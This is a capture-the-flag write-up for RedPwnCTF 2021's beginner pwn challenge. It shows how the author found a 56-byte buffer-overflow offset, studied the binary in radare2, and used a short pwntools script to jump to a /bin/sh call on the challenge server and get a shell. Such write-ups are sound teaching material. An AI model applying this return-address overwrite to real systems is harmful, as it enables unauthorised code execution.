RedPwnCTF-2021 - Writeup - pwn/beginner-generic-pwn-number-0
Greetings everyone!
This is going to be writeup about the challenge beginner-generic-pwn-number-0
of pwn
category from RedPwnCTF 2021.
Challenge 1: beginner-generic-pwn-number-0
Running the binary with sample input test
simply exited the program with no error code, while running the binary with very long input threw segmentation fault
error. So, the program had buffer overflow vulnerability.
Then, I tried to find the number of bytes after which overflow occured. I printed a large number of ‘A’ character and passed it to the program, which caused program to crash with same segmentation fault
error.
perl -E "print 'A' x 58" | ./beginner-generic-pwn-number-0
Then, I ran dmesg
command to print the message buffer of kernel.
It can be seen that crash was caused due to the bad value of RIP
register.
4141
are two extra A
characters that buffer couldn’t handle, and thus it overwrote the instruction pointer.
As we printed out 58
A
characters, and had two extra A
’s, the required offset will be 58-2
which equals to 56
.
Now, it’s time analyze the binary with radare2.
I opened the binary in radare2 with command:
r2 beginner-generic-pwn-number-0
, and analyzed the binary with aaaa
.
I extracted the binary info with iI
command.
As the binary didn’t have canary enable, and wasn’t stripped, exploiting it was easy.
Then, I printed functions list with afl
, and seeked to the main function with s main
.
Then, I printed the disassemble code of main function with pdf
command.
It can be seen that there is also an address 0x004012ac
which calls shell.
/bin/sh
As instruction pointer can be controlled , it is possible to jump to the address where shell can be executed.
I used pwntools to craft a simple exploit and got a shell.
from pwn import *
#elf = ELF('./beginner-generic-pwn-number-0')
#p = elf.process()
#print(p.recv())
p = remote("mc.ax", 31199)
payload = b"A"*56 + p64(0x004012ac)
p.sendline(payload)
p.interactive()
And there it was, I got shell, and got the flag.
Hope you learned something.
Thanks for reading!
- seizetheday